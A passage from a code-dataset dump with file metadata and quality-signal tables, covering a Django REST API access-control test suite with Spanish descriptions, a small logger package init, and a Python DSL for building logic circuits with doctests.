print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: El usuario no autenticado no puede agregar una tarea a la lista")
print("-----------")
def test_put_task_with_un_authenticate_user(self):
"""
En este caso de prueba, estamos probando la API Task PUT utilizando un usuario no autenticado.
"""
response = self.client.put(
reverse('api-task'), {'title': 'My Task'}, format='json')
is_passed = response.status_code == status.HTTP_403_FORBIDDEN
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "El usuario no autenticado no puede modificar una tarea"
})
if is_passed:
print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: El usuario no autenticado no puede modificar una tarea")
print("-----------")
def test_put_task_with_authenticated_user(self):
self.client.login(username='test_user', password='adminpass')
response = self.client.put(reverse('api-task-detail', args=[str(self.task.idTask)]), {'title': 'My Task 2'}, format='json')
is_passed = response.status_code == status.HTTP_200_OK
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "Usuario autenticado puede modificar una tarea suya"
})
if is_passed:
print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: Usuario autenticado puede modificar una tarea suya")
print("-----------")
def test_get_other_user_task_detail(self):
"""
En este caso de prueba, estamos probando la API Task GET y tratando de obtener detalles de la tarea de un usuario que usa credenciales de usuario diferentes.
"""
self.client.login(username='other_user', password='adminpass')
response = self.client.get(reverse('api-task-detail', args=[str(self.task.idTask)]))
is_passed = response.status_code == status.HTTP_404_NOT_FOUND
# is_passed = response.status_code == status.HTTP_403_FORBIDDEN
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "Solo el propietario puede ver el detalle de la tarea"
})
if is_passed:
print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: Solo el propietario puede ver el detalle de la tarea")
print("-----------")
def test_create_task_with_authenticated_user(self):
self.client.login(username='test_user', password='adminpass')
response = self.client.post(reverse('api-task'), {'title': 'My Task'}, format='json')
is_passed = response.status_code == status.HTTP_201_CREATED
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "Usuario autenticado agrega tarea a la lista"
})
if is_passed:
print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: Usuario autenticado agrega tarea a la lista")
print("-----------")
def test_get_task_detail(self):
self.client.login(username='test_user', password='adminpass')
response = self.client.get(reverse('api-task-detail', args=[str(self.task.idTask)]))
is_passed = response.status_code == status.HTTP_200_OK
TEST_RESULTS.append({
"result": "Passed" if is_passed else "Failed",
"test_name": inspect.currentframe().f_code.co_name,
"test_description": "Usuario autenticado puede ver detalles de la tarea correctamente"
})
if is_passed:
print("Resultado: Aprobado")
else:
print("Resultado: Fallido")
print("Nombre del test: " + inspect.currentframe().f_code.co_name)
print("Descripcion: Usuario autenticado puede ver detalles de la tarea correctamente")
print("-----------")
class CSVReportTest(APITestCase):
def test_send_csv(self):
send_test_csv_report(
test_results=TEST_RESULTS,
recipients=RECIPIENTS
)
```

Record 3 statistics and quality signals:

| avg_line_length | max_line_length | alphanum_fraction | effective | hits |
| --- | --- | --- | --- | --- |
| 37.370787 | 165 | 0.634245 | 0 | 6 |

| signal | *_quality_signal | flag |
| --- | --- | --- |
| qsc_code_num_words | 783 | 0 |
| qsc_code_num_chars | 6,652 | 0 |
| qsc_code_mean_word_length | 5.203065 | 0 |
| qsc_code_frac_words_unique | 0.177522 | null |
| qsc_code_frac_chars_top_2grams | 0.03731 | 0 |
| qsc_code_frac_chars_top_3grams | 0.029455 | 0 |
| qsc_code_frac_chars_top_4grams | 0.070692 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0.794551 | 0 |
| qsc_code_frac_chars_dupe_6grams | 0.77246 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.751841 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.728031 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.707904 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.672067 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.004797 | 0 |
| qsc_code_frac_chars_whitespace | 0.247895 | 0 |
| qsc_code_size_file_byte | 6,652 | 0 |
| qsc_code_num_lines | 177 | 0 |
| qsc_code_num_chars_line_max | 166 | 0 |
| qsc_code_num_chars_line_mean | 37.581921 | 0 |
| qsc_code_frac_chars_alphabet | 0.809514 | 0 |
| qsc_code_frac_chars_comments | 0.065394 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.556452 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.272831 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.072581 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0.193548 | 1 |
| qsc_codepython_frac_lines_import | 0.064516 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.153226 | 0 |
| qsc_codepython_frac_lines_print | 0.241935 | 0 |
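Record 3 parses cleanly (`qsc_codepython_cate_ast = 1`), and its `qsc_codepython_*` line-fraction signals suggest AST- or line-based counting over the source. A sketch of how such Python-specific signals could be derived with the standard library follows; the real extractor's definitions are not given in this dump, so the line-counting rules below are assumptions:

```python
import ast

def python_ast_signals(source: str) -> dict:
    # Sketch of plausible qsc_codepython_* derivations. Try to parse; a
    # SyntaxError maps to cate_ast = 0, mirroring a parse/no-parse category.
    try:
        tree = ast.parse(source)
    except SyntaxError:
        return {"cate_ast": 0}
    lines = [ln for ln in source.splitlines() if ln.strip()]
    n = len(lines) or 1
    imports = sum(isinstance(node, (ast.Import, ast.ImportFrom))
                  for node in ast.walk(tree))
    funcs = sum(isinstance(node, ast.FunctionDef) for node in ast.walk(tree))
    return {
        "cate_ast": 1,
        "frac_lines_import": imports / n,
        "frac_lines_func_ratio": funcs / n,
    }
```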
Record 4:

| field | value |
| --- | --- |
| hexsha | 8a45f1c6e8e51b93e9ab54060af5d33d536b2abf |
| size | 75 |
| ext | py |
| lang | Python |

| event group | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
| --- | --- | --- | --- | --- | --- | --- | --- |
| max_stars | logger/__init__.py | remmyzen/nqs-tensorflow2 | 2af5d5ebb108eac4d2daa5082bdef11c8107bd1b | ["MIT"] | 4 | 2021-07-29T17:52:54.000Z | 2022-02-15T06:32:15.000Z |
| max_issues | logger/__init__.py | remmyzen/nqs-tensorflow2 | 2af5d5ebb108eac4d2daa5082bdef11c8107bd1b | ["MIT"] | null | null | null |
| max_forks | logger/__init__.py | remmyzen/nqs-tensorflow2 | 2af5d5ebb108eac4d2daa5082bdef11c8107bd1b | ["MIT"] | null | null | null |

content:

```python
from .logger import Logger
from .logger_supervised import LoggerSupervised
```

Record 4 statistics and quality signals:

| avg_line_length | max_line_length | alphanum_fraction | effective | hits |
| --- | --- | --- | --- | --- |
| 25 | 47 | 0.866667 | 0 | 6 |

| signal | *_quality_signal | flag |
| --- | --- | --- |
| qsc_code_num_words | 9 | 1 |
| qsc_code_num_chars | 75 | 0 |
| qsc_code_mean_word_length | 7.111111 | 0 |
| qsc_code_frac_words_unique | 0.555556 | null |
| qsc_code_frac_chars_top_2grams | 0.3125 | 1 |
| qsc_code_frac_chars_top_3grams | 0 | 0 |
| qsc_code_frac_chars_top_4grams | 0 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0 | 0 |
| qsc_code_frac_chars_dupe_6grams | 0 | 0 |
| qsc_code_frac_chars_dupe_7grams | 0 | 0 |
| qsc_code_frac_chars_dupe_8grams | 0 | 0 |
| qsc_code_frac_chars_dupe_9grams | 0 | 0 |
| qsc_code_frac_chars_dupe_10grams | 0 | 0 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0 | 0 |
| qsc_code_frac_chars_whitespace | 0.106667 | 0 |
| qsc_code_size_file_byte | 75 | 0 |
| qsc_code_num_lines | 2 | 1 |
| qsc_code_num_chars_line_max | 48 | 0 |
| qsc_code_num_chars_line_mean | 37.5 | 0 |
| qsc_code_frac_chars_alphabet | 0.955224 | 0 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | true | 1 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 1 | 1 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 1 | 1 |
| qsc_codepython_frac_lines_print | 0 | 0 |
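The two-line `logger/__init__.py` illustrates how the bare `qsc_*` columns work as per-check flags: it is marked for too few words and lines, for an import-only body (`frac_lines_import = 1.0`, `score_lines_no_logic = 1.0`), and by the top-2-gram check. A sketch of that flagging pattern, with purely illustrative thresholds (the dump does not state the real cutoffs, and these three checks are only a subset of the pipeline's):

```python
# Illustrative thresholds only; not the pipeline's documented cutoffs.
THRESHOLDS = {
    "qsc_code_num_lines_quality_signal": ("min", 5),
    "qsc_codepython_frac_lines_import_quality_signal": ("max", 0.9),
    "qsc_codepython_score_lines_no_logic_quality_signal": ("max", 0.9),
}

def flag_record(record: dict) -> int:
    # Count how many hypothetical checks the record trips.
    tripped = 0
    for field, (kind, bound) in THRESHOLDS.items():
        value = record.get(field, 0)
        if (kind == "min" and value < bound) or (kind == "max" and value > bound):
            tripped += 1
    return tripped

# Record 4 would trip all three of these illustrative checks:
print(flag_record({
    "qsc_code_num_lines_quality_signal": 2,
    "qsc_codepython_frac_lines_import_quality_signal": 1.0,
    "qsc_codepython_score_lines_no_logic_quality_signal": 1.0,
}))  # -> 3
```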
Record 5:

| field | value |
| --- | --- |
| hexsha | 8a50b1905c10bef14015d0bd1e4794d8d3018140 |
| size | 38,121 |
| ext | py |
| lang | Python |

| event group | repo_path | repo_name | repo_head_hexsha | licenses | count | event_min_datetime | event_max_datetime |
| --- | --- | --- | --- | --- | --- | --- | --- |
| max_stars | circuitry/circuitry.py | nthparty/circuitry | e8bc8bde93cf5056368a14a21086f18f1bcd934f | ["MIT"] | 3 | 2020-06-23T19:11:53.000Z | 2021-01-06T16:42:56.000Z |
| max_issues | circuitry/circuitry.py | nthparty/circuitry | e8bc8bde93cf5056368a14a21086f18f1bcd934f | ["MIT"] | 4 | 2020-07-28T03:14:59.000Z | 2020-07-28T17:44:25.000Z |
| max_forks | circuitry/circuitry.py | nthparty/circuitry | e8bc8bde93cf5056368a14a21086f18f1bcd934f | ["MIT"] | 1 | 2020-06-23T19:07:59.000Z | 2020-06-23T19:07:59.000Z |

content:

```python
"""Embedded DSL for assembling logic circuits.
Embedded domain-specific combinator library for
assembling abstract definitions of logic circuits
and synthesizing circuits from those definitions.
"""
from __future__ import annotations
from typing import Sequence
import doctest
from parts import parts
from circuit import op, gate, circuit, signature
class bit():
"""
Class for representing an abstract bit. Such a bit
can be interpreted concretely as a value, but it is
also used to keep track of relationships between
operators and to represent the wires within a
circuit built up out of those operators.
>>> bit.hook_operation(lambda o, v, *args: None)
>>> bit.circuit(circuit())
>>> b = output(input(1).and_(input(1)))
>>> b.value == bit.circuit().evaluate([1,1])[0]
True
>>> def make_hook(bit_):
... def hook(o, v, *args):
... return bit_.constructor(*args)(v, bit_.gate(o, [a.gate for a in args]))
... return hook
>>> bit.hook_operation(make_hook(bit))
>>> bit.circuit(circuit())
>>> b = output(input(0).and_(input(0)))
>>> b.value == bit.circuit().evaluate([0,0])[0]
True
"""
_circuit = None
_hook_operation = None
@staticmethod
def circuit(circuit_=None):
if circuit_ is not None:
bit._circuit = circuit_
return None
else:
bit._circuit.prune_and_topological_sort_stable()
return bit._circuit
@staticmethod
def hook_operation(hook=None):
bit._hook_operation = hook
@staticmethod
def operation(o, *args):
# Ensure second argument is a `bit`.
args = list(args)
if len(args) == 2:
args[1] = constant(args[1]) if isinstance(args[1], int) else args[1]
# Compute the value of the result of the operation on the arguments.
v = o(*[a.value for a in args])
# Return output from hook if it exists and if
# it returns an output.
if bit._hook_operation is not None:
r = bit._hook_operation(o, v, *args)
if r is not None:
return r
return bit.constructor(*args)(v, bit.gate(o, [a.gate for a in args]))
@staticmethod
def constructor(b1, b2=None):
# The inference code below is not currently in use.
"""
if isinstance(b1, input_one) and isinstance(b2, input_one):
return input_one
elif isinstance(b1, input_two) and isinstance(b2, input_two):
return input_two
elif isinstance(b1, (input_one, input_two)) and b2 is None:
return type(b1)
else:
return bit
"""
return bit
@staticmethod
def gate(operation, igs):
return bit._circuit.gate(operation, igs)
def __init__(self, value, gate_=None):
self.value = value
self.gate = bit._circuit.gate() if gate_ is None else gate_
def __int__(self):
return self.value
def not_(self):
"""
>>> results = []
>>> for x in [0, 1]:
... bit.circuit(circuit())
... b = output(input(x).not_())
... results.append(int(b) == bit.circuit().evaluate([x])[0])
>>> all(results)
True
"""
return bit.operation(op.not_, self)
def __invert__(self):
"""
>>> results = []
>>> for x in [0, 1]:
... bit.circuit(circuit())
... b = output(~input(x))
... results.append(int(b) == bit.circuit().evaluate([x])[0])
>>> all(results)
True
"""
return bit.operation(op.not_, self)
def __rsub__(self, other):
"""
>>> results = []
>>> for x in [0, 1]:
... bit.circuit(circuit())
... b = output(1 - input(x))
... results.append(int(b) == bit.circuit().evaluate([x])[0])
>>> all(results)
True
>>> bit.circuit(circuit())
>>> 2 - input(0)
Traceback (most recent call last):
...
ValueError: can only subtract a bit from the integer 1
"""
if other == 1:
return bit.operation(op.not_, self)
raise ValueError('can only subtract a bit from the integer 1')
def and_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).and_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.and_, self, other)
def __and__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) & input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.and_, self, other)
def __rand__(self, other):
"""
>>> bit.circuit(circuit())
>>> b = 0 & constant(1)
>>> b.value
0
"""
return self & (constant(other) if isinstance(other, int) else other)
def nimp(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nimp(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nimp_, self, other)
def nimp_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nimp_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nimp_, self, other)
def __gt__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) > input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return self.nimp(other)
def nif(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nif(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nif_, self, other)
def nif_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nif_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nif_, self, other)
def __lt__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) < input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return self.nif(other)
def xor(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).xor(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xor_, self, other)
def xor_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).xor_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xor_, self, other)
def __xor__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) ^ input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xor_, self, other)
def __rxor__(self, other):
"""
>>> bit.circuit(circuit())
>>> b = 1 ^ constant(0)
>>> b.value
1
"""
return self ^ (constant(other) if isinstance(other, int) else other)
def or_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).or_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.or_, self, other)
def __or__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) | input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.or_, self, other)
def __ror__(self, other):
"""
>>> bit.circuit(circuit())
>>> b = 1 | constant(0)
>>> b.value
1
"""
return self | (constant(other) if isinstance(other, int) else other)
def nor(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nor(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nor_, self, other)
def nor_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nor_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nor_, self, other)
def __mod__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) % input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nor_, self, other)
def xnor(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).xnor(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xnor_, self, other)
def xnor_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).xnor_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xnor_, self, other)
def __eq__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) == input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.xnor_, self, other)
def if_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).if_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.if_, self, other)
def __ge__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) >= input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.if_, self, other)
def imp(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).imp(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.imp_, self, other)
def imp_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).imp_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.imp_, self, other)
def __le__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) <= input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.imp_, self, other)
def nand(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nand(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nand_, self, other)
def nand_(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x).nand_(input(y)))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nand_, self, other)
def __matmul__(self, other):
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... b = output(input(x) @ input(y))
... results.append(int(b) == bit.circuit().evaluate([x,y])[0])
>>> all(results)
True
"""
return bit.operation(op.nand_, self, other)
class constant(bit):
"""Bit that is designated as a constant input."""
class input(bit):
"""Bit that is designated as a variable input."""
def __init__(self: bit, value: int):
self.value = value
self.gate = bit._circuit.gate(op.id_, is_input=True)
class input_one(input):
"""Bit that is designated as a variable input from one source."""
class input_two(input):
"""Bit that is designated as a variable input from a second source."""
class output(bit):
"""
Bit that is designated an output.
>>> bit.circuit(circuit())
>>> b0 = output(input(1).not_())
>>> b1 = output(b0.not_())
>>> b2 = output(b0)
>>> [b0.value, b1.value, b2.value]
[0, 1, 0]
"""
def __init__(self: bit, b: bit):
# Check if bit is ready as final output or whether there are others dependent on it.
if len(b.gate.outputs) > 0:
b = ~(~b) # Preserve the bit by copying it to a new wire.
self.value = b.value
self.gate = bit._circuit.gate(op.id_, [b.gate], is_output=True)
class bits_type(int): # pylint: disable=R0903
"""
Class for representing an input or output type of a
function decorated for automated synthesis.
"""
class bits(list):
"""
Class for representing a vector of abstract bits.
"""
@staticmethod
def from_byte(byte_: int, constructor=bit) -> bits:
return bits([
constructor(bit_)
for bit_ in reversed([(byte_>>i)%2 for i in range(8)])
])
@staticmethod
def from_bytes(bytes_, constructor=bit) -> bits:
"""
>>> bit.circuit(circuit())
>>> [b.value for b in bits.from_bytes(bytes([255]))]
[1, 1, 1, 1, 1, 1, 1, 1]
>>> bit.circuit(circuit())
>>> [b.value for b in bits.from_bytes(bytes([11, 0]))]
[0, 0, 0, 0, 1, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0]
"""
return bits([
bit_
for byte_ in bytes_
for bit_ in bits.from_byte(byte_, constructor)
])
@staticmethod
def zeros(n: int) -> bits:
"""
>>> bit.circuit(circuit())
>>> xs = bits.zeros(3)
>>> ys = outputs(xs.not_())
>>> [y.value for y in ys]
[1, 1, 1]
"""
return bits([constant(0)]*n)
def __new__(cls, argument = None) -> bits:
"""
Return bits object given the supplied argument.
"""
return bits_type(argument)\
if isinstance(argument, int) else\
list.__new__(cls, argument)
def __int__(self: bits) -> int:
"""
>>> bit.circuit(circuit())
>>> xs = constants([0, 0, 0])
>>> ys = outputs(xs.not_())
>>> int(ys)
7
"""
return sum(int(b)*(2**i) for (i, b) in zip(range(len(self)), reversed(self)))
def not_(self: bits) -> bits:
"""
>>> results = []
>>> for x in [0, 1]:
... bit.circuit(circuit())
... xs = inputs([x, x, x])
... ys = outputs(xs.not_())
... ns = [int(y) for y in ys]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x]))
>>> all(results)
True
"""
return bits([x.not_() for x in self])
def __invert__(self: bits) -> bits:
"""
>>> results = []
>>> for x in [0, 1]:
... bit.circuit(circuit())
... xs = inputs([x, x, x])
... ys = outputs(~xs)
... ns = [int(y) for y in ys]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x]))
>>> all(results)
True
"""
return bits([x.not_() for x in self])
def and_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.and_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.and_(y) for (x, y) in zip(self, other)])
def __and__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs & ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.and_(y) for (x, y) in zip(self, other)])
def nimp(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nimp(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nimp_(y) for (x, y) in zip(self, other)])
def nimp_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nimp_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nimp_(y) for (x, y) in zip(self, other)])
def __gt__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs > ys)
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nimp_(y) for (x, y) in zip(self, other)])
def nif(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nif(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nif_(y) for (x, y) in zip(self, other)])
def nif_(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
... bit.circuit(circuit())
... (xs, ys) = (inputs([x, x, x]), inputs([y, y, y]))
... zs = outputs(xs.nif_(ys))
... ns = [int(z) for z in zs]
... c = bit.circuit()
... results.append(ns == c.evaluate([x, x, x, y, y, y]))
>>> all(results)
True
"""
return bits([x.nif_(y) for (x, y) in zip(self, other)])
def __lt__(self: bits, other: bits) -> bits:
"""
>>> results = []
>>> for (x, y) in [(0, 0), (0, 1), (1, 0), (1, 1)]:
